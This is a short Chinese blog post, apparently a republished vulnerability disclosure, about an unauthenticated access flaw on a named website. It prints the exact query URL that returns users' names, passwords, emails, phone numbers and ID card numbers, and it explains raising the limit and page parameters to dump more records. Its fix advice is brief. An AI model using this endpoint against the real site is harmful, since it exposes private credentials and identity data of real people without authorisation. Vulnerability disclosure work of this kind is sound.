【漏洞学习】DVP-2018-01271(敏感信息泄露)

本文揭示了一个严重的信息安全问题,详细介绍了如何通过未授权访问直接获取用户敏感信息,包括用户名、密码、邮箱、手机和身份证等。通过示例展示了如何利用特定URL参数控制显示的数据量,最后提出了修复此漏洞的建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

简要描述

 存在未授权访问,直接访问用户所有信息

漏洞证明

 https://www.asbtc.com//quenryClient/sys/getPageInfos.do?page=1&limit=100&email=&clientName=&tel=&status=&hz_key=

包含用户名,密码,邮箱,手机,身份证

拼接如:

https://www.asbtc.com//upload/153279326288***.jpg

控制显示长度只需调整limit和page参数如limit=200

https://www.asbtc.com//quenryClient/sys/getPageInfos.do?page=1&limit=200&email=&clientName=&tel=&status=&hz_key=

修复方案:

控制访问权限

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值